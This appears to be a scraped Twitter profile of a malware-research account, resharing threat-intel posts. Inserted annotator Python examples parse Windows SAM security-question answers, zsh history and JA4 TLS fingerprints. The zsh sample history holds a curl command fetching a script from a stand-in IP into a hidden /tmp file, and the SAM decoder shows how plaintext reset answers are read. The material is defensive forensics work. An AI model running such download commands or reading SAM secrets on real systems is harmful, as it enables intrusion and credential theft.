Arkbird (@Arkbird_SOLG)'s Twitter Profile
Arkbird

@Arkbird_SOLG

Malware slayer
Member of @CuratedIntel

ID: 1089248858058772480

Joined: 26-01-2019 19:48:59

6.6K Tweets

13.6K Followers

64 Following

ESET Research (@ESETresearch)

has discovered the Lunar toolset, two previously unknown backdoors (which we named and ) possibly linked to Turla, compromising a European MFA and its diplomatic missions abroad. welivesecurity.com/en/eset-resear… 1/6

ESET Research (@ESETresearch)

releases a paper about Ebury, among the most advanced server-side Linux malware, which was deployed to 400,000 servers over the course of 15 years, primarily for financial gain. Marc-Etienne M.Léveillé welivesecurity.com/en/eset-resear… 1/8

Group-IB Threat Intelligence (@GroupIB_TI)

Group-IB TI team detected that:
1) moved from distributing malicious links via email to injecting malicious code into compromised websites to redirect visitors
2) cybercrime group uses infrastructure as 3rd party provider to deliver their initial stage

Binni Shah (@binitamshah)

Guntior - the story of an advanced bootkit that doesn't rely on Windows disk drivers : artemonsecurity.blogspot.com/2024/04/guntio… credits @artem_i_baranov
Stephan Berger (@malmoeb)

In-depth examination of the Sliver C2 framework.

I highly recommend reading this series for every BlueTeamer to understand the internals and building blocks of a (modern) C2 framework.

dominicbreuker.com/post/learning_…

Grzegorz Tworek (@0gtweet)

Making my computer unhackable after realizing 'Security questions' are actually UTF-16LE JSON stored as ResetData REG_BINARY in HKLM\SAM\SAM\Domains\Account\Users\...

Stephan Berger (@malmoeb)
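An added example of the parsing step behind the tweet above (my code, not @0gtweet's): given a .reg export of the ResetData value from under HKLM\SAM\SAM\Domains\Account\Users\..., reassemble the wrapped hex:, decode the UTF-16LE text and load the JSON. The JSON shape (a version field plus a list of question/answer objects) and the sample contents are constructed for this example; the export format is the one reg.exe writes (comma-separated bytes, lines ending in a backslash, continuation lines indented two spaces). Reading the live SAM hive needs SYSTEM, so in practice the bytes come from an offline hive copy or an export taken as SYSTEM.

```python
"""Decode a Windows 'security questions' blob: UTF-16LE JSON stored as the REG_BINARY
value ResetData under HKLM\\SAM\\SAM\\Domains\\Account\\Users\\..., read from a .reg export."""
import json

VALUE_NAME = "ResetData"

# Constructed sample payload. Its shape (a version field and a list of question/answer
# objects) is an assumption for this example, not copied from a real SAM hive.
SAMPLE_PAYLOAD = {
    "version": 1,
    "questions": [
        {"question": "What was your first pet's name?", "answer": "Rex"},
        {"question": "What is your mother's maiden name?", "answer": "Ciphertext"},
    ],
}


def encode_payload(payload: dict) -> bytes:
    """Serialise the way the blob is stored: compact JSON as UTF-16LE, no BOM."""
    return json.dumps(payload, separators=(",", ":")).encode("utf-16-le")


def make_reg_export(value_name: str, blob: bytes, per_line: int = 25) -> str:
    """Render a REG_BINARY value the way reg.exe export does: 'hex:' followed by
    comma-separated bytes, wrapped with a trailing backslash and two-space continuation lines."""
    pairs = [f"{b:02x}" for b in blob]
    rows = [pairs[i:i + per_line] for i in range(0, len(pairs), per_line)]
    lines = []
    for n, row in enumerate(rows):
        prefix = f'"{value_name}"=hex:' if n == 0 else "  "
        suffix = ",\\" if n < len(rows) - 1 else ""
        lines.append(prefix + ",".join(row) + suffix)
    return "\n".join(lines)


def reg_hex_to_bytes(reg_text: str, value_name: str) -> bytes:
    """Reassemble the wrapped hex value from a .reg export back into bytes."""
    lines = reg_text.splitlines()
    for i, line in enumerate(lines):
        if not line.startswith(f'"{value_name}"=hex:'):
            continue
        buf = line.split("=hex:", 1)[1]
        while buf.endswith("\\"):          # continuation: drop the backslash, append next line
            i += 1
            buf = buf[:-1] + lines[i].strip()
        return bytes(int(h, 16) for h in buf.split(",") if h)
    raise KeyError(f"{value_name} not found in export")


def decode_reset_data(blob: bytes) -> dict:
    """ResetData is UTF-16LE text holding JSON; tolerate a trailing NUL terminator."""
    return json.loads(blob.decode("utf-16-le").rstrip("\x00"))


def question_summary(blob: bytes):
    """What a triage script should report: the questions and whether an answer is set,
    without echoing the answers themselves into a log."""
    data = decode_reset_data(blob)
    return [(q.get("question"), bool(q.get("answer"))) for q in data.get("questions", [])]


def demo() -> dict:
    """Round trip: payload -> .reg text -> bytes -> JSON."""
    blob = encode_payload(SAMPLE_PAYLOAD)
    export = make_reg_export(VALUE_NAME, blob)
    recovered = reg_hex_to_bytes(export, VALUE_NAME)
    assert recovered == blob
    return decode_reset_data(recovered)


if __name__ == "__main__":
    print(make_reg_export(VALUE_NAME, encode_payload(SAMPLE_PAYLOAD)))
    print(question_summary(encode_payload(SAMPLE_PAYLOAD)))
```

The answers are stored as plain text in the JSON, which is the point of the tweet: anyone who can read the SAM hive (SYSTEM on the box, or whoever holds a backup or shadow copy of it) reads the reset questions and answers directly.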

New blog post: Today I Learned - Zsh History Timestamps
dfir.ch/posts/today_i_…

In Zsh, the shell session retains the command history with timestamps in memory. Each executed command is logged in the history along with a timestamp denoting its execution time.

Yarden Shafir (@yarden_shafir)
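An added example for the zsh post above (my code, not from dfir.ch): the timestamps the tweet mentions survive on disk when EXTENDED_HISTORY is set, as ": <start epoch>:<duration>;<command>" lines in the history file, which is what an IR analyst actually has after the session is gone. The parser below turns such a file into a UTC timeline and handles two things that trip up naive one-liners: multi-line commands, which zsh stores with a backslash before each embedded newline, and zsh's "metafied" bytes (0x83 followed by the original byte XOR 0x20). The sample history is constructed, not a real capture.

```python
"""Rebuild a command timeline from a zsh history file written with EXTENDED_HISTORY."""
import re
from datetime import datetime, timezone

# With EXTENDED_HISTORY set, each entry is written as ": <start epoch>:<duration s>;<command>".
_ENTRY = re.compile(rb"^: (\d+):(\d+);(.*)\Z", re.DOTALL)

# zsh 'metafies' bytes that collide with its internal token range: such a byte is written
# as 0x83 followed by the original byte XOR 0x20. Undo that before decoding the command.
_META = 0x83


def unmetafy(data: bytes) -> bytes:
    out = bytearray()
    i = 0
    while i < len(data):
        if data[i] == _META and i + 1 < len(data):
            out.append(data[i + 1] ^ 0x20)
            i += 2
        else:
            out.append(data[i])
            i += 1
    return bytes(out)


def split_entries(raw: bytes):
    """One item per logical entry. A line ending in a backslash continues on the next line,
    which is how zsh stores multi-line commands; the newline is part of the command."""
    entries, pending = [], None
    for line in raw.split(b"\n"):
        text = line if pending is None else pending + b"\n" + line
        if text.endswith(b"\\"):
            pending = text[:-1]
            continue
        pending = None
        if text:
            entries.append(text)
    if pending is not None:
        entries.append(pending)
    return entries


def parse_history(raw: bytes):
    """Return dicts in file order: epoch, ISO-8601 UTC start time, duration in seconds and
    the command. Entries written while EXTENDED_HISTORY was off carry no timing data."""
    timeline = []
    for entry in split_entries(raw):
        m = _ENTRY.match(entry)
        if m:
            epoch, duration = int(m.group(1)), int(m.group(2))
            cmd = m.group(3)
            start = datetime.fromtimestamp(epoch, tz=timezone.utc).isoformat()
        else:
            epoch = duration = start = None
            cmd = entry
        timeline.append({
            "epoch": epoch,
            "start_utc": start,
            "duration_s": duration,
            "command": unmetafy(cmd).decode("utf-8", errors="replace"),
        })
    return timeline


# Constructed sample, not a real capture: a plain command, a multi-line command, a command
# containing a metafied byte (UTF-8 0xc4 0x85 = 'ą', stored as 0xc4 0x83 0xa5), and one
# entry written while EXTENDED_HISTORY was off.
SAMPLE_HISTORY = (
    b": 1715000000:0;whoami\n"
    b": 1715000007:3;curl -fsSL http://198.51.100.7/a.sh \\\n"
    b"  -o /tmp/.x\n"
    b": 1715000012:0;echo \xc4\x83\xa5\n"
    b"id\n"
)

if __name__ == "__main__":
    for row in parse_history(SAMPLE_HISTORY):
        print(row["start_utc"], row["duration_s"], repr(row["command"]))
```

The epoch is the time the command started and the duration is how long it ran, so a long duration on an otherwise quiet timeline (a reverse shell, a transfer) is itself a lead. Keep in mind that the file is only written when the shell decides to (on exit, or incrementally with INC_APPEND_HISTORY / SHARE_HISTORY), so a session that was killed may never have flushed the entries the tweet says are held in memory.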

Google Chrome sends an ETW event when someone tries to read your passwords.
You should enable these events and monitor them.

hackerfantastic.x (@hackerfantastic)

Lennart Poettering intends to replace 'sudo' with systemd's run0. Here's a quick PoC to demonstrate root permission hijacking by exploiting the fact 'systemd-run' (the basis of uid0/run0, the sudo replacer) creates a user owned pty for communication with the new 'root' process.

Kostas (@Kostastsale)

This is awesome! Incredibly useful for IR and beats my handmade notes 😆

Thank you to the folks that made this guide public 🙏 🙏

Get the PDF directly from here 🔗 cdn-dynmedia-1.microsoft.com/is/content/mic…

HyperDbg (@HyperDbg)

Soon we'll say welcome to our new family member, hwdbg. 🛠️⚙️🔲

Hardware Debugger, or hwdbg, is a new class of event-driven chip debuggers that allows precise signal control down to the period of a single clock cycle.

github.com/HyperDbg/hwdbg

blackorbird (@blackorbird)

Analyzing APT28 custom post-compromise tool for exploiting CVE-2022-38028 to obtain credentials
(Windows Print Spooler Elevation of Privilege Vulnerability)
microsoft.com/en-us/security…

vx-underground (@vxunderground)

Malware review:

2024-02-27 - European diplomats targeted by SPIKEDWIRE with WINELOADER

Notes:
*Zscaler on release of this article did not attribute it to any state-sponsored Threat Actor
*Mandiant later attributed this payload to APT29 March, 22nd 2024 in an article titled:

Group-IB Threat Intelligence (@GroupIB_TI)

From late 2023 to early 2024, has continued to target government entities in the Southeast Asia. Group-IB researchers have spotted several initial infection vectors (documents/executables) similar to previous Sharp Panda operations. These malicious files deliver the

Sinaei (@Intel80x86)

If you've ever worked with HyperDbg, you probably know that everything in HyperDbg is treated as an event.

This new debugger is designed to allow us to control the smallest unit in computers which is a clock cycle, so we can execute custom actions for each event (clock).

Kuba Gretzky (@mrgretzky)

Really interesting how easy it is to fingerprint TLS connections established from Go applications, by checking JA4 signature patterns.

You'd be amazed how many automated malicious URL scanners also use the same JA4 signature.

From: github.com/FoxIO-LLC/ja4

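An added example to make the tweet's point concrete (my code, written from the published JA4 spec as I understand it; it is not taken from the FoxIO repository). JA4 is built from the ClientHello's TLS version, SNI presence, cipher suites, extensions, signature algorithms and first ALPN value, with GREASE values stripped and the SNI value itself left out. That last detail is why a fixed TLS stack such as Go's crypto/tls yields one fingerprint no matter which host it connects to, which is what makes Go-based scanners and tooling so easy to group. The ClientHello below is constructed for illustration and is not Go's real cipher or extension list; non-printable ALPN values are an edge case the spec treats specially and this example assumes printable ones.

```python
"""Build a JA4 client fingerprint from fields already parsed out of a TLS ClientHello."""
import hashlib
from dataclasses import dataclass, field, replace
from typing import List, Optional

# TLS version as JA4 encodes it: the highest supported_versions entry if that extension is
# present, otherwise the legacy ClientHello version.
_VERSION_TAG = {0x0304: "13", 0x0303: "12", 0x0302: "11", 0x0301: "10", 0x0300: "s3", 0x0002: "s2"}
SNI_EXT, ALPN_EXT = 0x0000, 0x0010


def is_grease(v: int) -> bool:
    """RFC 8701 GREASE values (0x0a0a, 0x1a1a, ..., 0xfafa) are random per connection,
    so JA4 drops them from every count and hash."""
    return (v >> 8) == (v & 0xFF) and (v & 0x0F) == 0x0A


@dataclass
class ClientHello:
    legacy_version: int
    ciphers: List[int]
    extensions: List[int]                                # extension types, wire order
    supported_versions: List[int] = field(default_factory=list)
    sig_algs: List[int] = field(default_factory=list)    # signature_algorithms, wire order
    alpn: List[str] = field(default_factory=list)
    sni: Optional[str] = None
    quic: bool = False


def _hex_list(values) -> str:
    return ",".join(f"{v:04x}" for v in values)


def _h12(s: str) -> str:
    """Truncated SHA-256 as JA4 uses it; an empty list hashes to twelve zeros."""
    return hashlib.sha256(s.encode()).hexdigest()[:12] if s else "000000000000"


def ja4(ch: ClientHello, raw: bool = False) -> str:
    """Return JA4 (hashed) or, with raw=True, JA4_r (the same sorted lists unhashed)."""
    versions = [v for v in ch.supported_versions if not is_grease(v)]
    ver = _VERSION_TAG.get(max(versions) if versions else ch.legacy_version, "00")
    ciphers = sorted(c for c in ch.ciphers if not is_grease(c))
    exts = [e for e in ch.extensions if not is_grease(e)]
    # ALPN tag: first and last character of the first ALPN value ("h2" -> h2, "http/1.1" -> h1).
    # Assumption for this example: ALPN values are printable ASCII.
    alpn_tag = (ch.alpn[0][0] + ch.alpn[0][-1]) if ch.alpn else "00"
    part_a = (f"{'q' if ch.quic else 't'}{ver}{'d' if ch.sni else 'i'}"
              f"{min(len(ciphers), 99):02d}{min(len(exts), 99):02d}{alpn_tag}")
    # JA4_b: sorted cipher suites. JA4_c: sorted extensions minus SNI and ALPN, then the
    # signature algorithms in original order. The SNI value never enters the fingerprint.
    part_b = _hex_list(ciphers)
    part_c = _hex_list(sorted(e for e in exts if e not in (SNI_EXT, ALPN_EXT)))
    if ch.sig_algs:
        part_c += "_" + _hex_list(ch.sig_algs)
    if raw:
        return f"{part_a}_{part_b}_{part_c}"
    return f"{part_a}_{_h12(part_b)}_{_h12(part_c)}"


def same_client_different_site(ch: ClientHello, new_sni: str) -> bool:
    """What a detection rule relies on: only SNI presence counts, so one TLS stack
    produces the same JA4 against every host it talks to."""
    return ja4(replace(ch, sni=new_sni)) == ja4(ch)


# Constructed sample ClientHello (15 real ciphers + 1 GREASE, 13 real extensions + 1 GREASE).
# Illustrative only; this is not the actual crypto/tls ClientHello.
SAMPLE = ClientHello(
    legacy_version=0x0303,
    ciphers=[0x0a0a, 0x1301, 0x1302, 0x1303, 0xc02b, 0xc02f, 0xc02c, 0xc030, 0xcca9, 0xcca8,
             0xc013, 0xc014, 0x009c, 0x009d, 0x002f, 0x0035],
    extensions=[0x1a1a, 0x0000, 0x0005, 0x000a, 0x000b, 0x000d, 0x0010, 0x0012, 0x0017,
                0x002b, 0x002d, 0x0033, 0xff01, 0x0023],
    supported_versions=[0x2a2a, 0x0304, 0x0303],
    sig_algs=[0x0403, 0x0804, 0x0401, 0x0503, 0x0805, 0x0501, 0x0806, 0x0601],
    alpn=["h2", "http/1.1"],
    sni="example.com",
)

if __name__ == "__main__":
    print(ja4(SAMPLE))
    print(ja4(SAMPLE, raw=True))
    print(same_client_different_site(SAMPLE, "other.example.net"))
```

For JA4_a the sample yields t13d1513h2: TCP, TLS 1.3 from supported_versions, SNI present, 15 ciphers, 13 extensions, ALPN h2. When you compare a suspect connection against a known tooling fingerprint, compare the whole string; JA4_a alone collides across many unrelated clients, and a client that randomises cipher order (as some browsers do) still matches because both hashed lists are sorted.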